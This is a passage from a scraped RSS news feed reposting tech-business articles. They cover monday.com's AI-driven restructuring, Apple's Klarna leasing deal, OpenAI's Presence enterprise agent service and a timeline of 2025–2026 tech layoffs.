<p class="wp-block-paragraph">“We have never seen such a significant opportunity in software, driven by such exciting technology,” Zinman noted. He emphasized that the reduction is not to replace people with AI, nor to improve margins; the “vast majority” of savings will be reinvested into talent, products, and AI.</p>



<p class="wp-block-paragraph">The restructuring will result in a “flatter organization” with fewer management layers and smaller, more autonomous teams, and monday.com also has a new go-to-market model, Zinman explained. Customers expect “deeper implementation support” as they deploy AI, and the company will work more closely with customers, increase its on-site presence, create new roles, and “adapt many existing ones.” In its SEC filing, the company said it expects to continue hiring in “key strategic areas” throughout 2026.</p>



<p class="wp-block-paragraph">Workers will be expected to work better, “not harder,” Zinman noted. He pointed to several past examples where work could have been done in a few days, but instead took many months with “multiple meetings and endless friction.”</p>



<p class="wp-block-paragraph">“This wasn’t people’s fault and everyone was frustrated by this,” he said. “Our new org changes ownership to allow people to make decisions and move fast.”</p>



<p class="wp-block-paragraph">A spokesperson for monday.com declined to comment further on the staff reductions.</p>



<h2 class="wp-block-heading">Monday.com’s key market advantages</h2>



<p class="wp-block-paragraph">Monday.com certainly isn’t struggling; the company expects 19% to 20% year-over-year growth in 2026.</p>



<p class="wp-block-paragraph">“Companies in that position do not restructure because they must,” Greyhound’s Gogia noted. “They restructure because they have decided to become something else.”</p>



<p class="wp-block-paragraph"><a href="https://moorinsightsstrategy.com/team/melody-brue/" target="_blank" rel="noreferrer noopener">Melody Brue</a>, VP and principal analyst at Moor Insights &amp; Strategy, pointed out that organizational redesign is important for real AI transformation, but while it can signal confidence to the market, it can still be “devastating” to humans.</p>



<p class="wp-block-paragraph">While the company looks as though it’s trying to do right, that ultimately remains to be seen, she said. “There are often hidden internal bruises that can surface long after layoffs.”</p>



<p class="wp-block-paragraph">Monday.com’s advantage is in its “structured substrate,” Gogia noted; its boards, permissions and typed workflows give agents something firmer to act on than just documents and chat history. The company highlights its natively built agents that can be configured by any team member, as well as connectors with Claude, Microsoft Copilot, and ChatGPT, and dedicated routes for external agents to authenticate and operate.</p>



<p class="wp-block-paragraph">“For some time, the sharper enterprise question has been shifting from who has an agent to who owns the governed runtime in which an agent can safely act,” he said. “Structured work is a serious claim on that runtime.”</p>



<p class="wp-block-paragraph">But parts of monday.com’s agent estate remain in staged release, and its product is ultimately “mid-transition,” Gogia pointed out; its agent builder carried a beta label as recently as March,. Also, the company’s pricing model changed in May to a hybrid model charging for seats as well as mandatory AI credits. And, while its AI-powered no-code builder monday vibe passed $1 million in annual recurring revenue within two and a half months, monday.com has not released subsequent outcomes, usage volumes, or attach rates.</p>



<p class="wp-block-paragraph">Further, there’s an element of “gravity” with its competitors, he observed. Asana is reorganizing teams around agents, Atlassian is wiring agents into the developer estate, and others are simply bundling them into their offerings: Microsoft is doing so across the productivity stack, and ServiceNow across enterprise operations, each with identity and procurement built in.</p>



<p class="wp-block-paragraph">“Their pull is strongest exactly where monday.com wants to grow, in the largest accounts, where control-plane depth and administrative reach decide the deal,” said Gogia.</p>



<h2 class="wp-block-heading">Actions for the near-term</h2>



<p class="wp-block-paragraph">Going forward, buyers should focus on operating risk, not headline risk, Moor’s Brue noted. In practice, that’s continuity of service, roadmap consistency, and strength of enterprise support. Productivity should be valued as better outcomes per unit of organizational effort, not mere activity.</p>



<p class="wp-block-paragraph">“It should be a measure of how much smoother, faster, and more effective the operating model becomes when AI is built into the work,” said Brue.</p>



<p class="wp-block-paragraph">Gogia noted that strain surfaces first in customer service, and monday.com’s attention is being redistributed. The company’s annual report disclosed that its focus is now concentrated on the largest accounts, with support for medium-sized clients moved to an AI-first and human-supported model.</p>



<p class="wp-block-paragraph">During the first month of the transition, buyers should track named account continuity and escalation times, he advised. By the first quarter, keep an eye on whether credit governance and admin controls mature on schedule, and if the roadmap beyond the AI estate keeps pace. By the half-year mark, determine whether promised implementation depth is producing outcomes or “simply more billable engagement.”</p>



<p class="wp-block-paragraph">Support tiers should be enumerated in writing before renewal, and <a href="https://www.cio.com/article/4192312/4-recs-for-cios-to-optimize-ai-budgets-and-improve-sustainability.html" target="_blank">buyers should contract</a> for “side exits,” Gogia emphasized, with overage pricing fixed in advance, the right to pause consumption, and portability for workflows and agent configuration “if the relationship sours.” Finance should also insist on monthly consumption reporting by capability. Further, integration efforts, partner dependency, and change management should be considered first-class costs of the agent era, “not as afterthoughts to a license.”</p>



<p class="wp-block-paragraph">“A license was a known cost,” said Gogia. “A meter is a behavior, and behavior is harder to forecast than headcount.”</p>



<p class="wp-block-paragraph"><em>This article originally appeared on <a href="https://www.cio.com/article/4200330/monday-com-cuts-20-of-its-workforce-to-restructure-for-the-ai-era.html" target="_blank">CIO.com</a>.</em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Own nothing, upgrade everything: Apple’s new Klarna deal]]></title>
<description><![CDATA[Just in time for the iPhone’s 20th anniversary, Apple is moving closer to becoming a service company. It is set to launch its new deal with Klarna next week and when it does, Apple enthusiasts in the US will effectively be able to subscribe to their favorite Apple hardware, with the cost spread a...]]></description>
<link>https://tsecurity.de/de/3694772/ai-nachrichten/own-nothing-upgrade-everything-apples-new-klarna-deal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694772/ai-nachrichten/own-nothing-upgrade-everything-apples-new-klarna-deal/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Just in time for the iPhone’s 20th anniversary, Apple is moving closer to becoming a service company. It is set to <a href="https://www.reuters.com/business/apple-launch-upgrade-device-leasing-program-spur-sales-bloomberg-news-reports-2026-07-21/" target="_blank" rel="noreferrer noopener">launch its new deal</a> with Klarna next week and when it does, Apple enthusiasts in the US will effectively be able to subscribe to their favorite Apple hardware, with the cost spread across up to three years.</p>



<p class="wp-block-paragraph">This matters because when combined with Apple One and Apple’s Creator Studio subscriptions, the Klarna arrangement brings Apple closer to offering a full subscription model for hardware, software, and services. The only thing you don’t get under the new arrangement is AppleCare, for which you’ll allegedly need to pay extra.</p>



<h2 class="wp-block-heading"><strong>Moving closer to hardware-as-a-service</strong></h2>



<p class="wp-block-paragraph">Apple has slowly been <a href="https://www.applemust.com/opinion-how-you-will-access-apple-products-in-future/#google_vignette" target="_blank" rel="noreferrer noopener">transitioning toward</a> hardware-as-a-service for almost a decade. Back then, Forrester analyst <a href="https://www.applemust.com/apple-klarna-mean-we-can-now-get-apple-as-a-service/" target="_blank" rel="noreferrer noopener">Frank Gillet predicted</a> the company would eventually offer bundles of services and products for a monthly, all-in, fee. </p>



<p class="wp-block-paragraph">This isn’t quite where we are yet; you still need at least three subscriptions to get close. But, after the better part of a decade, Apple has moved much nearer to the hardware-as-a-service idea.</p>



<p class="wp-block-paragraph">There are some products reportedly excluded from the arrangement, including MacBook Neo, Apple Watch SE, the entry-level iPad, and iPhone 16. Clearly, Apple sees those products as sufficiently affordable. </p>



<h2 class="wp-block-heading"><strong>Easy payments for RAM-ageddon</strong></h2>



<p class="wp-block-paragraph">The new Klarna arrangement comes as Apple is forced to increase product prices as AI-driven memory price inflation becomes widely felt across every economy. In theory, I assume, Apple hopes to make its products available to cash-strapped consumers who need new hardware, while also navigating a time of deep economic tumult and uncertainty. It’s thought the company has <a href="https://www.bloomberg.com/news/newsletters/2025-04-06/will-apple-raise-iphone-prices-in-the-us-after-trump-tariffs-iphone-17-details" target="_blank" rel="noreferrer noopener">previously rejected these plans</a> to protect normal hardware sales, but normality is a kingdom we no longer seem to possess. Interesting times. Probable inflation incoming.</p>



<p class="wp-block-paragraph">“Apple Upgrade lands at precisely the moment Apple needs it,” IDC analyst Francisco Jeronimo wrote in a note seen by <em>Computerworld</em>. “Having just pushed Mac and iPad prices up on the back of the memory shortage, with iPhone increases widely expected in September — as well as the new iPhone foldable expected at $2,500 — Apple’s real risk is that rising prices even further can impact the upgrade cycle.” </p>



<h2 class="wp-block-heading"><strong>New age, new shopping habits</strong></h2>



<p class="wp-block-paragraph">The introduction of the scheme gives consumers a way to purchase the company’s popular high-end devices when they are introduced — no doubt,at higher cost — this fall. Plus, of course, if it’s <a href="https://www.businessinsider.com/general-motors-gm-earnings-subscriptions-revenue-business-2026-1" target="_blank" rel="noreferrer noopener">good enough for GM</a>, it’s good enough for Apple.</p>



<p class="wp-block-paragraph">It’s all about attitude, too. From Apple’s perspective, it <a href="https://www.computerworld.com/article/4125784/are-you-ready-for-apple-as-a-service.html">has done plenty of the groundwork</a> required to <a href="https://www.applemust.com/apple-vp-eddy-cue-shares-15-important-apple-services-stats/" target="_blank" rel="noreferrer noopener">convince its customers</a> that subscription payments for things you value are no bad thing. </p>



<p class="wp-block-paragraph">Reluctance to embrace “Access Not Ownership’”purchasing models has dropped dramatically since Apple — and <a href="https://www.computerworld.com/article/1665439/apples-tim-cook-has-kept-his-50b-services-promises.html">CEO Tim Cook</a> — first began <a href="https://www.applemust.com/apples-50b-services-target-just-isnt-ambitious-enough/">banging the drum</a> for services income. Apple’s services stream has now become its second-biggest revenue driver after the iPhone. It has over 1 billion paid subscriptions, and an active hardware installed base of <a href="https://www.computerworld.com/article/4168225/wwdc-2026-how-apple-can-take-a-great-leap-in-ai.html">more than 2.5 billion devices globally</a>.</p>



<p class="wp-block-paragraph">A combination of changed customer habits and external threat means the stars are now aligned for hardware-as-a-service models. “Reframing a device as a low monthly payment protects that [upgrade] cadence and allows Apple to start marketing their products as device-as-a-service to consumers, which no other vendor was ever able to do,” Jeronimo wrote to me. </p>



<p class="wp-block-paragraph">There is a one-more-thing aspect to this: the products are effectively being leased, a new approach that will give Apple a stronger grip on EOL devices, helping it grab more of them for refurbishment, resale, and recycling. Over time, this will give the company a much stronger grip on the lucrative second-user market that exists around Apple equipment, even while for almost every consumer product we find the life we want is something we can rent, but <a href="https://medium.com/from-heart-to-hand/the-subscription-society-what-happens-when-you-own-nothing-ef32d5bc32d2" target="_blank" rel="noreferrer noopener">probably can’t afford to own</a>.</p>



<h2 class="wp-block-heading"><strong>Managing future risk</strong></h2>



<p class="wp-block-paragraph">The other solid reason to take a partnership approach is risk management. Apple had intended to develop its own buy-now, pay-later scheme via Apple Pay Later, but <a href="https://www.bbc.co.uk/news/articles/c255y82y9x8o" target="_blank" rel="noreferrer noopener">abandoned that plan</a> as it became riskier with rising bank rates. “Also, by backing the program with Klarna rather than reviving the in-house subscription plan it shelved in 2024, Apple captures the demand upside without taking the credit risk onto its own balance sheet,” Jeronimo said.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Presence raises new questions about enterprise automation and jobs]]></title>
<description><![CDATA[OpenAI has launched Presence, an enterprise service for deploying voice and chat agents that can resolve customer and employee requests, potentially automating some work now handled by frontline support teams.



The agents can answer questions and operate IT systems, and enterprises can decide w...]]></description>
<link>https://tsecurity.de/de/3694769/ai-nachrichten/openai-presence-raises-new-questions-about-enterprise-automation-and-jobs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694769/ai-nachrichten/openai-presence-raises-new-questions-about-enterprise-automation-and-jobs/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:08 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenAI has launched Presence, an enterprise service for deploying voice and chat agents that can resolve customer and employee requests, potentially automating some work now handled by frontline support teams.</p>



<p class="wp-block-paragraph">The agents can answer questions and operate IT systems, and enterprises can decide what actions the agents may take and when they should seek human approval for actions or transfer a case to a human.</p>



<p class="wp-block-paragraph">OpenAI is already using Presence internally for its English-language phone support channel, where it verifies callers and uses account information to complete approved actions. The company said the system resolves 75% of inbound issues without human assistance.</p>



<p class="wp-block-paragraph">Another OpenAI service, Codex, can be used to monitor agents and suggest updates or improvements to processes. In OpenAI’s own tests, suggestions from Codex helped reduce handoffs to humans by 15 percentage points over 10 days, it said. Presence also includes simulation and evaluation tools that allow companies to test an agent before deployment. The tests assess whether it reaches the correct outcome, follows company policy, and hands a case to an employee when required.</p>



<p class="wp-block-paragraph">OpenAI intends each Presence deployment to deal with one kind of task, for example billing issues, insurance claims, or employee IT service requests, with agents getting only the knowledge and system access required for that task.</p>



<p class="wp-block-paragraph">Presence is not a self-service product: Enterprises will have to sign up for the limited availability program, with integration performed by OpenAI or selected <a href="https://www.computerworld.com/article/4136024/openai-partners-with-consulting-giants-to-deploy-enterprise-ai-agents.html">global systems integrators</a>.</p>



<p class="wp-block-paragraph">Companies exploring or testing Presence include Spanish bank BBVA, which is evaluating the service for everyday banking support in Mexico, and Japanese technology group SoftBank, which is using it in trials involving Japanese-language customer interactions. Australian insurer IAG is assessing whether the technology can help it respond to surges in customer demand during severe weather events.</p>



<h2 class="wp-block-heading">Workforce impact</h2>



<p class="wp-block-paragraph">OpenAI’s announcement did not address the potential effect of Presence on employment. But its claimed automation rate raises questions about how the technology could affect staffing in customer service and other support functions.</p>



<p class="wp-block-paragraph"><a href="https://pareekh.com/" target="_blank" rel="noreferrer noopener">Pareekh Jain</a>, CEO of Pareekh Consulting, said CIOs should regard the 75% figure as evidence that the technology can work, rather than as a benchmark that every enterprise can expect to reach.</p>



<p class="wp-block-paragraph">Jain said OpenAI’s deployment benefits from being built around the company’s own products and data. Large enterprises may achieve lower automation rates because they must contend with fragmented legacy systems, uneven knowledge bases and more complex compliance demands.</p>



<p class="wp-block-paragraph">“Most organizations should expect lower initial automation levels that improve over time as the AI agent is refined,” Jain said.</p>



<p class="wp-block-paragraph">The first workforce effect is more likely to be <a href="https://www.cio.com/article/4015750/cios-see-ai-prompting-new-it-hiring-even-as-boards-push-for-job-cuts.html">slower hiring than immediate layoffs</a>, according to <a href="https://www.linkedin.com/in/tulikasheel/" target="_blank" rel="noreferrer noopener">Tulika Sheel</a>, senior vice president at Kadence International.</p>



<p class="wp-block-paragraph">“The roles most exposed are likely to be repetitive, high-volume functions such as frontline customer support and routine back-office processing,” Sheel said. “However, I would expect the first impact to be on hiring and team growth rather than immediate large-scale job cuts. Over time, enterprises may redesign roles around AI-assisted workflows, with humans focusing more on complex cases, escalation, and relationship management.”</p>



<p class="wp-block-paragraph">Jain said Tier-1 support agents handling predictable queries would face the most exposure. Broader reductions would become more likely only after companies reorganize their operations around the technology.</p>



<p class="wp-block-paragraph">However, <a href="https://omdia.tech.informa.com/authors/lian-jye-su" target="_blank" rel="noreferrer noopener">Lian Jye Su</a>, chief analyst at Omdia, said Presence is unlikely to increase the threat of job displacement because companies have used similar customer-support automation from vendors such as Genesys, NiCE, Five9 and AWS for years.</p>



<p class="wp-block-paragraph">Enterprises are more likely to use Presence alongside employees, with AI handling routine requests while people remain responsible for work requiring judgment and empathy, Su said.</p>



<h2 class="wp-block-heading">Cost and operational risks</h2>



<p class="wp-block-paragraph">Analysts said CIOs should examine whether Presence can maintain resolution quality as usage grows, since fewer human handoffs could leave employees dealing with a more difficult mix of cases.</p>



<p class="wp-block-paragraph">“The key question is not simply how many tasks AI can handle, but whether it can handle them reliably at scale,” Sheel said.</p>



<p class="wp-block-paragraph">The financial case will depend partly on the cost of connecting Presence to existing systems and maintaining the controls needed to govern its use, according to Jain. “Often the biggest cost of enterprise AI is not tokens but <a href="https://www.computerworld.com/article/4128310/openai-responds-to-claude-cowork-with-its-own-platform-to-help-build-deploy-and-manage-ai-agents.html">integration and governance</a>,” Jain added.</p>



<p class="wp-block-paragraph">Companies will need to determine what systems and data the agents can access, monitor their performance, and audit the actions they take. Those investments could offset early savings.</p>



<p class="wp-block-paragraph">Su said the complexity of enterprise IT will make it difficult for OpenAI to automate entire workflows on its own. Enterprises will still need to work with other technology providers and human employees, while CIOs will favor systems that can be audited and integrated with existing infrastructure.</p>



<p class="wp-block-paragraph">Jain said the economics could improve if companies use the same integrations and governance controls across additional workflows.</p>



<p class="wp-block-paragraph"><em>This article first appeared on <a href="https://www.cio.com/article/4200684/openai-presence-raises-new-questions-about-enterprise-automation-and-jobs.html">CIO</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tech layoffs: A 2026 timeline]]></title>
<description><![CDATA[Among a range of factors leading to a wave of tech sector layoffs in 2026 is the rapid rise of artificial intelligence and automation. Companies are reconfiguring their workforces to leverage AI for increased efficiency and reduced operating costs. This realignment and reduction is implemented ev...]]></description>
<link>https://tsecurity.de/de/3694770/ai-nachrichten/tech-layoffs-a-2026-timeline/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694770/ai-nachrichten/tech-layoffs-a-2026-timeline/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:08 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Among a range of factors leading to a wave of tech sector layoffs in 2026 is the rapid rise of artificial intelligence and automation. Companies are reconfiguring their workforces to leverage AI for increased efficiency and reduced operating costs. This realignment and reduction is implemented even by companies reporting strong financial performance.</p>



<p class="wp-block-paragraph">But it’s not just AI leading to workforce cuts. Complementing this technological shift are ongoing economic uncertainty, inflation, and higher interest rates, compounded by a chip shortage and rising energy costs. This mix is driving companies to cut costs and streamline operations for increased efficiency.</p>



<p class="wp-block-paragraph">According to data compiled by <a href="https://layoffs.fyi/" target="_blank" rel="noreferrer noopener">Layoffs.fyi</a>, an online tracker that keep tabs on job losses in the technology sector, 123,941 tech employees were laid off at 269 companies in 2025. The site also reports that 71,981 government employees were laid off by DOGE alone, with 182,528 total federal workers laid off.</p>



<p class="wp-block-paragraph">Here is a list — to be updated regularly — of some of the most prominent technology layoffs the industry has experienced recently.</p>



<h2 class="wp-block-heading">Notable tech layoffs in 2026</h2>



<ul class="wp-block-list">
<li>Monday.com</li>



<li>Microsoft</li>



<li>Meta</li>



<li>Cisco</li>



<li>Cloudflare</li>



<li>Oracle</li>



<li>Atlassian </li>



<li>Salesforce</li>



<li>Amazon</li>



<li>Ericsson</li>
</ul>



<h3 class="wp-block-heading">July 22, 2026: Monday.com cuts 20% of its workforce to restructure for the AI era</h3>



<p class="wp-block-paragraph">The company says the decision to <a href="https://www.computerworld.com/article/4200349/monday-com-cuts-20-of-its-workforce-to-restructure-for-the-ai-era-2.html">cut 620 jobs</a> isn’t about margins, but about creating a flatter organization built around AI agents, autonomous teams, and deeper customer engagement.</p>



<h3 class="wp-block-heading">July 6, 2026: Microsoft cuts 4,800 jobs, primarily in sales and Xbox teams</h3>



<p class="wp-block-paragraph">As the company <a href="https://www.computerworld.com/article/4193532/microsoft-bets-that-enterprise-ai-needs-engineers-not-bigger-sales-teams-2.html" target="_blank">trims thousands of jobs</a>, it’s also investing in embedded engineering teams and AI infrastructure. The layoffs come several weeks after the company offered 8,750 US employees <a href="https://www.computerworld.com/article/4163188/microsoft-to-offer-voluntary-retirement-buyouts-to-about-7-of-the-us-workforce.html">voluntary retirement buyouts</a>.</p>



<h3 class="wp-block-heading">June 5, 2026: Tech industry cut 38,242 jobs in May, worst since 2024</h3>



<p class="wp-block-paragraph">AI was blamed for 40% of <a href="https://www.computerworld.com/article/4181822/tech-industry-cut-38242-jobs-in-may-worst-since-2024.html">the job cuts in May</a>, up from 7% in January, according to research by employment placement company Challenger, Gray &amp; Christmas.</p>



<h3 class="wp-block-heading">May 20, 2026: Meta cuts 8,000 jobs, around 10% of workforce</h3>



<p class="wp-block-paragraph">The cuts are expected to expected to hit Meta’s engineering and product teams the hardest, arriving as Meta pivots toward AI to boost efficiency across its organization, <a href="https://tech.yahoo.com/general/article/meta-starts-cutting-8000-jobs-as-part-of-previously-announced-layoffs-145220586.html" target="_blank" rel="noreferrer noopener">according to Yahoo Tech</a>.</p>



<h3 class="wp-block-heading">May 13, 2026: Cisco to cut nearly 4,000 jobs despite strong growth in AI, enterprise networking</h3>



<p class="wp-block-paragraph">Despite reporting positive financial news — including record third-quarter revenue of $15.8 billion, a 12% year-over-year increase — Cisco said it will <a href="https://www.networkworld.com/article/4171043/cisco-to-cut-nearly-4000-jobs-despite-strong-growth-in-ai-enterprise-networking.html" target="_blank">eliminate almost 4,000 jobs</a>.</p>



<h3 class="wp-block-heading">May 7, 2026: Cloudflare to cut 1,100 jobs in AI-focused restructuring</h3>



<p class="wp-block-paragraph">About <a href="https://finance.yahoo.com/markets/stocks/articles/cloudflare-cut-over-1-100-204726989.html" target="_blank" rel="noreferrer noopener">20% of Cloudflare’s global workforce will be culled</a> as the company pivots for the agentic AI era, Reuters reported.</p>



<h3 class="wp-block-heading">April 1, 2026: Oracle to cut up to 30,000 jobs globally, putting enterprise support and roadmaps at risk</h3>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4153113/oracle-cuts-up-to-30000-jobs-globally-putting-enterprise-support-and-roadmaps-at-risk.html">Oracle began laying off employees</a> on March 31 in what could be the largest workforce reduction in the company’s history. Employees received termination emails at 6 a.m. local time with immediate system lockouts and no prior warning. <em>(Note: in June, CNBC put the <a href="https://www.cnbc.com/2026/06/23/oracle-ai-job-cuts-layoffs-21000.html" target="_blank" rel="noreferrer noopener">final layoff tally at 21,000</a>.)</em></p>



<h3 class="wp-block-heading">March 12, 2026: Atlassian cuts 1,600 jobs to fund AI and enterprise expansion</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4144218/atlassian-cuts-1600-jobs-to-fund-ai-and-enterprise-expansion.html">Atlassian will reduce its global workforce</a> by approximately 10%, eliminating around 1,600 roles, as the collaboration software maker redirects capital toward artificial intelligence development and enterprise sales.</p>



<h3 class="wp-block-heading">March 11, 2026: Tech layoffs surpass 45,000 in early 2026</h3>



<p class="wp-block-paragraph">A recent analysis by RationalFX found 45,363 job cuts globally so far this year—with roughly 68% or more than 30,000 occurring in the U.S. — highlighting ongoing <a href="https://www.networkworld.com/article/4143749/tech-layoffs-surpass-45000-in-early-2026.html" target="_blank">workforce cuts even as many tech companies report strong revenue growth</a>.</p>



<h3 class="wp-block-heading">February 10, 2026: Salesforce lays off staffers as executive leadership churn continues</h3>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4130028/salesforce-lays-off-staffers-as-executive-leadership-churn-continues.html" target="_blank">Salesforce has reduced close to 1,000 roles</a> earlier this month across teams, including marketing, product management, data analytics, and its <a href="https://www.cio.com/article/4011936/salesforce-agentforce-3-promises-new-ways-to-monitor-and-manage-ai-agents.html">Agentforce</a> AI unit, <a href="https://www.businessinsider.com/salesforce-cuts-jobs-executive-changes-2026-2">Business Insider</a> reported, quoting employees familiar with the matter.</p>



<h3 class="wp-block-heading">January 23, 2026: Amazon layoffs expected to disproportionately hit AWS and tech talent</h3>



<p class="wp-block-paragraph">As the market slows down, <a href="https://www.computerworld.com/article/4121653/amazon-layoffs-expected-to-disproportionately-hit-aws-and-tech-talent.html">AWS and other Amazon units are preparing for another round of layoffs</a>, which is expected to overwhelmingly impact tech talent. An email from HR leader Beth Galetti on Jan. 28 <a href="https://www.computerworld.com/article/4123477/amazon-confirms-16000-job-cuts-including-to-aws.html">confirmed 16,000 job cuts</a>.</p>



<h3 class="wp-block-heading">January 15, 2026: Ericsson plans to shed 1,600 jobs in Sweden</h3>



<p class="wp-block-paragraph"> Ericsson lans to cut some 1,600 jobs in Sweden, the telecommunications equipment maker said doubling down on recent cost-saving measures that have helped it weather a prolonged downturn in telecoms spending, <a href="https://www.reuters.com/business/world-at-work/ericsson-shed-1600-jobs-sweden-2026-01-15/" target="_blank" rel="noreferrer noopener">Reuters reports</a>.</p>



<h3 class="wp-block-heading">January 13, 2026: Meta plans to cut around 10% of employees in Reality Labs business</h3>



<p class="wp-block-paragraph">Meta plans to cut around 10% of the employees in its Reality Labs division who work on products including the metaverse, according to three people with knowledge of the discussions, <a href="http://meta%20plans%20to%20cut%20around%2010%25%20of%20employees%20in%20reality%20labs%20business/" target="_blank" rel="noreferrer noopener">according to The New York Times</a>.</p>



<h2 class="wp-block-heading">Layoffs in 2025</h2>



<ul class="wp-block-list">
<li>Cisco</li>



<li>Oracle</li>



<li>Windsurf</li>



<li>Intel</li>



<li>Microsoft</li>



<li>Crowdstrike</li>



<li>HPE</li>



<li>Autodesk</li>



<li>HPE</li>



<li>CISA</li>



<li>Workday</li>



<li>Salesforce</li>



<li>Meta</li>
</ul>



<h3 class="wp-block-heading">Global tech-sector layoffs surpass 244,000 in 2025</h3>



<p class="wp-block-paragraph">Economic uncertainty, elevated interest rates, and AI adoption have <a href="https://www.networkworld.com/article/4114572/global-tech-sector-layoffs-surpass-244000-in-2025.html" target="_blank">driven workforce reductions across tech companies worldwide</a>, according to a RationalFX report.</p>



<h3 class="wp-block-heading">October 28, 2025: Amazon to cut 14,000 jobs across company</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4080142/amazon-to-cut-14000-jobs-across-company.html">Amazon will reduce its overall workforce</a> by 14,000, cutting layers of management across the company and hiring in some areas to support its “biggest bets”.</p>



<h3 class="wp-block-heading">August 18, 2025: Cisco and Oracle to cut hundreds of Bay Area jobs</h3>



<p class="wp-block-paragraph">Tech companies Cisco and Oracle are <a href="https://www.sfchronicle.com/tech/article/cisco-oracle-layoffs-bay-area-20824135.php" target="_blank" rel="noreferrer noopener">cutting hundreds of jobs across the Bay Area</a>. Cisco will eliminate 221 positions at its Milpitas and San Francisco offices, effective Oct. 13. Oracle is reducing 101 positions in Santa Clara on the same date </p>



<h3 class="wp-block-heading">August 5, 2025: 3 weeks after acquiring Windsurf, Cognition offers staff the exit door</h3>



<p class="wp-block-paragraph">Cognition, the AI coding startup that acquired rival company Windsurf three weeks ago, laid off 30 employees last week and is offering buyouts to the roughly 200 remaining employees on the team, <a href="https://www.theinformation.com/articles/cognition-offers-buyouts-newly-acquired-windsurf-staff" target="_blank" rel="noreferrer noopener">reports The Information</a>.</p>



<h3 class="wp-block-heading">July 25, 2025, Intel to lay off 22% of workforce, CEO Tan signals ‘no more blank checks’</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4028896/intel-to-lay-off-22-of-workforce-as-ceo-tan-signals-no-more-blank-checks.html">Intel will reduce its workforce to 75,000 employees</a> by the end of 2025 as new CEO Lip-Bu Tan implements sweeping changes designed to transform the struggling chipmaker</p>



<h3 class="wp-block-heading">July 8, 2025, Intel layoffs begin: Chipmaker is cutting many thousands of jobs</h3>



<p class="wp-block-paragraph">Intel has begun laying off employees across the company. CEO Lip-Bu Tan told workers back in April to expect <a href="https://www.oregonlive.com/silicon-forest/2025/07/intel-layoffs-begin-chipmaker-is-cutting-many-thousands-of-jobs.html">major layoffs at Intel </a>in the coming months as the chipmaker slashes costs and overhauls its organization after years of technical setbacks and falling sales. </p>



<h3 class="wp-block-heading">July 2, 2025: Microsoft will cut 9,000 workers</h3>



<p class="wp-block-paragraph">Microsoft will lay off about 9,000 employees, a source familiar with the workforce cut <a href="https://www.nbcnews.com/business/business-news/microsoft-laying-9000-employees-latest-cuts-rcna216553">told CNBC</a>.  The cuts will reportedly affect less than 4% of Microsoft’s global workforce and will impact different teams, geographies and levels of experience. This is the latest in a string of cuts the tech giant has made this year.</p>



<h3 class="wp-block-heading">June 17, 2025: Intel looks to factory layoffs to return to profitability</h3>



<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/4008670/can-intel-cut-its-way-to-profit-with-factory-layoffs.html">Intel will lay off up to 20% of its manufacturing sector employees</a> starting in July,  according to media reports, as the company looks for options as it seeks a return to profitability. The cuts reportedly will be made around the world, but some of the layoffs will be closer to home, according to a report in The Oregonian citing an internal company memo from Intel manufacturing Vice President Naga Chandrasekaran.</p>



<h3 class="wp-block-heading">May 7, 2025: CrowdStrike to lay off 5% of staff</h3>



<p class="wp-block-paragraph"><a href="https://www.reuters.com/sustainability/crowdstrike-lay-off-5-staff-reaffirms-forecasts-2025-05-07/">CrowdStrike announced a plan to cut about 500 roles</a>, roughly 5% of its workforce, to streamline operations and reduce costs. The cybersecurity company will incur about $36 million to $53 million in charges related to the layoffs</p>



<h3 class="wp-block-heading">March 6, 2025: HPE cuts 2,500 jobs, remains committed to Juniper buy</h3>



<p class="wp-block-paragraph">CEO Antonio Neri told Wall Street analysts that <a href="https://www.networkworld.com/article/3840596/hpe-cuts-2500-workers-expects-juniper-buy-to-close-end-of-25-faces-tariff-issues.html">HPE would begin implementing a cost-cutting program involving layoffs </a>of about 2,500 employees over the next 18 months. HPE employs about 61,000 people worldwide.</p>



<h3 class="wp-block-heading">Feb. 27, 2025: Autodesk to lay off 9% of workforce</h3>



